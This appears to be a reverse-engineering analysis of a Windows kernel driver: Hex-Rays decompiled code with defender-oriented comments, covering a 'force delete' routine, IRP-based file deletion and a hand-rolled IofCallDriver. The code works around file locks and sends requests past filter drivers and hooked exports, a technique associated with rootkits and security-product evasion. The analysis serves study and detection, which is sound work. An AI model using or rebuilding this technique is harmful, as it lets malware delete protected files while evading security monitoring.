//////////////////////////////////////////////////////////////////
////////////////////////// FORCE DELETE FILES ////////////////////
///////////////////////////////////////////////////////////////////
/*
 * sub_401000 - open a file given as a DOS-style path (L"X:\...") and delete
 * it through hand-built IRPs, optionally after detaching the file's section
 * objects ("Force Delete").
 *
 * a1: NUL-terminated UTF-16 path. a1[1] must be L':' (58), i.e. a
 *     drive-letter path.
 * a2: non-zero selects the force-delete branch (see inline notes).
 * Returns an NTSTATUS-style value: the status of the last IRP helper on the
 * success path, 0xC0000001 (STATUS_UNSUCCESSFUL) when the IRQL check or the
 * drive lookup fails, 0xC000000D (STATUS_INVALID_PARAMETER) when a1[1] is
 * not L':'.
 *
 * This is Hex-Rays output: stack slots are named vN and the FILE_OBJECT is
 * touched through raw DWORD offsets. Field meanings in the comments are
 * inferred from the 32-bit kernel structure layouts and marked as such.
 *
 * NOTE(review): the copy loop below ("do { ... } while ( v13 )") has no
 * bound. The destination is v16 followed by the 0x206 bytes of v17 (0x208
 * bytes = 260 WCHARs); a longer input overruns the stack frame. Worth
 * knowing when triaging a crash dump produced by this driver.
 */
signed int __stdcall sub_401000(__int16 *a1, int a2)
{
signed int result; // eax@2
int v3; // eax@12
int v4; // eax@12
UNICODE_STRING DestinationString; // [sp+0h] [bp-23Ch]@9
__int16 *v6; // [sp+8h] [bp-234h]@5
int v7; // [sp+Ch] [bp-230h]@7
int v8; // [sp+10h] [bp-22Ch]@7
int v9; // [sp+14h] [bp-228h]@1
int v10; // [sp+18h] [bp-224h]@1
__int16 *v11; // [sp+1Ch] [bp-220h]@5
__int16 *v12; // [sp+20h] [bp-21Ch]@5
__int16 v13; // [sp+26h] [bp-216h]@6
int v14; // [sp+28h] [bp-214h]@9
PVOID Object; // [sp+2Ch] [bp-210h]@9
unsigned __int16 v16; // [sp+30h] [bp-20Ch]@1
char v17; // [sp+32h] [bp-20Ah]@1
WCHAR SourceString; // [sp+34h] [bp-208h]@9
/* v16 (2 bytes) + v17 (0x206 bytes) form one contiguous 0x208-byte WCHAR
 * buffer on the stack; zero it before the copy below. */
v16 = 0;
memset(&v17, 0, 0x206u);
/* v10 / v9 hold the two section-object pointers saved by the force path. */
v10 = 0;
v9 = 0;
/* Only proceed below DISPATCH_LEVEL (IRQL 2); the file I/O helpers below
 * presumably need a pageable context. */
if ( (signed int)KeGetCurrentIrql() < 2 )
{
/* 58 == L':' — require a drive-letter path such as L"C:\path\file". */
if ( a1[1] == 58 )
{
v11 = a1;
v12 = (__int16 *)&v16;
v6 = (__int16 *)&v16;
/* Unbounded WCHAR copy of a1 into the v16 buffer, terminator included
 * (see the NOTE in the header). v6 is set but not read afterwards. */
do
{
v13 = *v11;
*v12 = v13;
++v11;
++v12;
}
while ( v13 );
/* sub_4016A0 is not on this page. It receives the drive letter (v16) and
 * fills v7/v8, which are then handed to irpcreate_file — presumably the
 * volume's device object and a related object; confirm in sub_4016A0. */
if ( sub_4016A0(v16, &v7, &v8) )
{
/* SourceString is 4 bytes past v16, i.e. the path with the "X:" prefix
 * stripped (grounded by the stack offsets: v16 @ +30h, SourceString @ +34h). */
RtlInitUnicodeString(&DestinationString, &SourceString);
/* irpcreate_file is not on this page. The literals line up with
 * SYNCHRONIZE (0x100000), FILE_ATTRIBUTE_NORMAL (128),
 * FILE_SHARE_READ|FILE_SHARE_WRITE (3), FILE_OPEN (1) and
 * FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE (0x60) — verify
 * against its prototype. On success Object receives the FILE_OBJECT. */
v14 = irpcreate_file(&DestinationString, 0x100000, 128, 3, 1, 96, v7, v8, (int)&Object);
/* The DbgPrint strings in this function are stable artifacts of the binary
 * and are usable as triage/detection strings. */
DbgPrint("IrpFileCreate returned [%08X]\n", v14);
if ( v14 >= 0 )
{
if ( a2 )
{
DbgPrint("Force Delete ...\n");
/* Force path. (_DWORD *)Object + 5 is offset 0x14 of the FILE_OBJECT,
 * which on 32-bit builds is SectionObjectPointer (inferred). The code
 * saves and then clears the pointers at +0 and +8 of that struct — in the
 * public SECTION_OBJECT_POINTERS layout DataSectionObject and
 * ImageSectionObject; confirm against the target build. With these
 * cleared the file system no longer treats the file as mapped/in use,
 * which is what lets the delete below succeed on a locked file.
 * NOTE(review): there is no NULL check on SectionObjectPointer before the
 * double dereference; a file object without one faults here. */
v10 = **((_DWORD **)Object + 5);
v9 = *(_DWORD *)(*((_DWORD *)Object + 5) + 8);
**((_DWORD **)Object + 5) = 0;
*(_DWORD *)(*((_DWORD *)Object + 5) + 8) = 0;
}
/* IoGetBaseFileSystemDeviceObject returns the lowest device of the file
 * system stack. Requests sent there directly skip the filter devices
 * attached above it, so filter-based file protections may not observe
 * these operations — relevant when assessing what this driver evades. */
v3 = IoGetBaseFileSystemDeviceObject(Object);
/* 128 is FILE_ATTRIBUTE_NORMAL; presumably clears read-only/system bits so
 * the delete is not refused. irp_set_attrib is not on this page. */
v14 = irp_set_attrib(Object, v3, 128);
DbgPrint("IrpSetFileAttributes returned [%08X]\n", v14);
v4 = IoGetBaseFileSystemDeviceObject(Object);
/* irp_file_delete is not on this page; irp_delete_alloc below shows the
 * IRP shape this driver uses for deletion. Its status is what the
 * function ultimately returns. */
v14 = irp_file_delete((struct _FILE_OBJECT *)Object, v4);
DbgPrint("IrpFileDelete returned [%08X]\n", v14);
/* Put the saved section-object pointers back regardless of the delete
 * outcome. */
if ( a2 )
{
**((_DWORD **)Object + 5) = v10;
*(_DWORD *)(*((_DWORD *)Object + 5) + 8) = v9;
}
/* Drop the reference taken by the create. */
ObfDereferenceObject(Object);
}
/* On a failed create this is the create status; otherwise the delete status. */
result = v14;
}
else
{
/* 0xC0000001 STATUS_UNSUCCESSFUL: drive letter lookup failed. */
result = -1073741823;
}
}
else
{
/* 0xC000000D STATUS_INVALID_PARAMETER: a1 is not a drive-letter path. */
result = -1073741811;
}
}
else
{
/* 0xC0000001 STATUS_UNSUCCESSFUL: called at DISPATCH_LEVEL or above. */
result = -1073741823;
}
return result;
}
//////////////////////////////////////////////////////////////////
/////////////// FILE DELETER VIA IRP
//////////////////////////////////////////////////////////////////
/*
 * irp_delete_alloc - build a synchronous IRP_MJ_SET_INFORMATION request for
 * a1, dispatch it to device a2 via sub_4015C0, and wait for completion.
 *
 * a1: FILE_OBJECT the request targets.
 * a2: DEVICE_OBJECT the request is dispatched to (decompiled as int; fields
 *     are read by raw offset).
 * Returns the status word of the completed request, or 0xC000009A
 * (STATUS_INSUFFICIENT_RESOURCES) when IoAllocateIrp returns NULL.
 *
 * The decompiler substituted IRP_MJ_* enum names for several plain integer
 * constants below; only their numeric values are meaningful (see notes).
 */
unsigned int __stdcall irp_delete_alloc(struct _FILE_OBJECT *a1, int a2)
{
unsigned int result; // eax@2
struct _KEVENT Event; // [sp+0h] [bp-28h]@1
unsigned int v4; // [sp+10h] [bp-18h]@3
int v5; // [sp+18h] [bp-10h]@3
int v6; // [sp+1Ch] [bp-Ch]@3
PIRP IRP; // [sp+20h] [bp-8h]@1
char v8; // [sp+27h] [bp-1h]@3
/* Event the completion path signals; waited on only if the request pends. */
KeInitializeEvent(&Event, SynchronizationEvent, 0);
/* a2 + 48 (0x30) is DEVICE_OBJECT.StackSize on 32-bit builds (inferred);
 * second argument is ChargeQuota = FALSE. */
IRP = IoAllocateIrp(*(_BYTE *)(a2 + 48), 0);
if ( IRP )
{
IRP->MdlAddress = 0;
/* IRP_MJ_QUERY_SECURITY is 0x14; as an IRP.Flags value that bit pattern
 * appears to be IRP_SYNCHRONOUS_API | IRP_BUFFERED_IO (decompiler mislabel). */
IRP->Flags |= IRP_MJ_QUERY_SECURITY;
/* RequestorMode 0 == KernelMode. */
IRP->RequestorMode = 0;
/* v4 is the Status member of the user IO_STATUS_BLOCK; the 4 bytes after it
 * (unnamed here, up to v5 at +18h) are Information. */
IRP->UserIosb = (PIO_STATUS_BLOCK)&v4;
IRP->UserEvent = &Event;
IRP->PendingReturned = 0;
IRP->Cancel = 0;
IRP->CancelRoutine = 0;
/* KeGetCurrThread is a local name, not the kernel export; assumed to be a
 * wrapper around KeGetCurrentThread — confirm. */
IRP->Tail.Overlay.Thread = KeGetCurrThread();
IRP->Tail.Overlay.AuxiliaryBuffer = 0;
IRP->Tail.Overlay.OriginalFileObject = a1;
/* AssociatedIrp is a union; the member written is SystemBuffer, pointed at
 * the 1-byte v8. v8 = 1 reads as FILE_DISPOSITION_INFORMATION.DeleteFile
 * = TRUE, consistent with the class/length values set below (inferred). */
IRP->AssociatedIrp.IrpCount = (LONG)&v8;
v8 = 1;
/* v6 is the next IO_STACK_LOCATION, typed as int by the decompiler. */
v6 = IoGetNextIrpStackLocation((int)IRP);
/* 32-bit IO_STACK_LOCATION offsets (inferred): +0 MajorFunction,
 * +4 Parameters.SetFile.Length, +8 Parameters.SetFile.FileInformationClass,
 * +12 Parameters.SetFile.FileObject, +20 DeviceObject, +24 FileObject.
 * IRP_MJ_FILE_SYSTEM_CONTROL (13) is numerically FileDispositionInformation
 * and IRP_MJ_CREATE_NAMED_PIPE (1) is sizeof(FILE_DISPOSITION_INFORMATION);
 * both are decompiler enum mislabels — confirm against the headers. */
*(_BYTE *)v6 = IRP_MJ_SET_INFORMATION;
*(_DWORD *)(v6 + 20) = a2;
*(_DWORD *)(v6 + 24) = a1;
*(_DWORD *)(v6 + 8) = IRP_MJ_FILE_SYSTEM_CONTROL;
*(_DWORD *)(v6 + 4) = IRP_MJ_CREATE_NAMED_PIPE;
*(_DWORD *)(v6 + 12) = a1;
/* sub_401920 is not on this page; its argument shape (irp, routine, context,
 * three flags) resembles IoSetCompletionRoutine with sub_401850 as the
 * completion routine — presumably, verify. */
sub_401920((int)IRP, (int)sub_401850, 0, 1, 1u, 1);
/* Dispatch through the hand-rolled IofCallDriver equivalent (sub_4015C0),
 * bypassing the exported routine. 259 == 0x103 STATUS_PENDING. */
v5 = sub_4015C0(0, a2, (int)IRP);
if ( v5 == 259 )
KeWaitForSingleObject(&Event, 0, 0, 1u, 0);
/* Return the completed request's status. */
result = v4;
}
else
{
/* STATUS_INSUFFICIENT_RESOURCES. */
result = 0xC000009A;
}
return result;
}
////////////////////////////////////////////////////
//////////////// PROCESSOR IRPSTACKLOCATION ///////
////////////////////////////////////////////////////
/*
 * sub_4015C0 - hand-rolled equivalent of IofCallDriver: advance the IRP to
 * its next stack location and invoke the target driver's dispatch routine
 * directly out of its MajorFunction table.
 *
 * a1: DRIVER_OBJECT to dispatch through, or 0 to take it from the device
 *     object (a2 + 8).
 * a2: DEVICE_OBJECT (decompiled as int; fields read by raw offset).
 * a3: IRP (decompiled as int; fields read by raw offset).
 * Returns the dispatch routine's status, or 0xC0000001 (STATUS_UNSUCCESSFUL)
 * when no stack locations remain (where the real IofCallDriver bug-checks
 * with NO_MORE_IRP_STACK_LOCATIONS instead).
 *
 * Defender note: because the dispatch routine is called directly rather than
 * through the exported IofCallDriver, instrumentation of that export does not
 * see these requests. A driver that re-implements IofCallDriver this way is
 * itself a strong triage signal; the "Normal Call MJ[%d]" DbgPrint string is
 * a stable artifact of this binary.
 */
signed int __stdcall sub_4015C0(int a1, int a2, int a3)
{
char v3; // ST1B_1@1
signed int result; // eax@2
int (__stdcall *v5)(int, int); // ST10_4@5
int v6; // ST0C_4@5
int v7; // [sp+8h] [bp-Ch]@3
/* a3 + 35 (0x23) is IRP.CurrentLocation on 32-bit builds (inferred);
 * pre-decrement exactly as IofCallDriver does. v3 is a signed char. */
v3 = *(_BYTE *)(a3 + 35) - 1;
*(_BYTE *)(a3 + 35) = v3;
/* Mirrors the kernel's "stack locations exhausted" check. */
if ( v3 > 0 )
{
v7 = IoGetNextIrpStackLocation(a3);
/* a3 + 96 (0x60) is IRP.Tail.Overlay.CurrentStackLocation (inferred). */
*(_DWORD *)(a3 + 96) = v7;
/* v7 + 20 (0x14): the stack location's DeviceObject (inferred). */
*(_DWORD *)(v7 + 20) = a2;
/* No driver supplied: a2 + 8 is DEVICE_OBJECT.DriverObject (inferred). */
if ( !a1 )
a1 = *(_DWORD *)(a2 + 8);
/* 56 (0x38) is the start of DRIVER_OBJECT.MajorFunction[] on 32-bit builds
 * (inferred); index by the stack location's MajorFunction byte (*v7). */
DbgPrint("Normal Call MJ[%d] %p\n", *(_BYTE *)v7, *(_DWORD *)(a1 + 4 * *(_BYTE *)v7 + 56));
v5 = *(int (__stdcall **)(int, int))(a1 + 4 * *(_BYTE *)v7 + 56);
/* Control Flow Guard check emitted by the compiler for the indirect call. */
__guard_check_icall_fptr(v5);
/* Direct call of the dispatch routine: (DeviceObject, Irp). */
v6 = v5(a2, a3);
DbgPrint("FsCallDriver returned [%08X]\n", v6);
result = v6;
}
else
{
/* STATUS_UNSUCCESSFUL. */
result = -1073741823;
}
return result;
}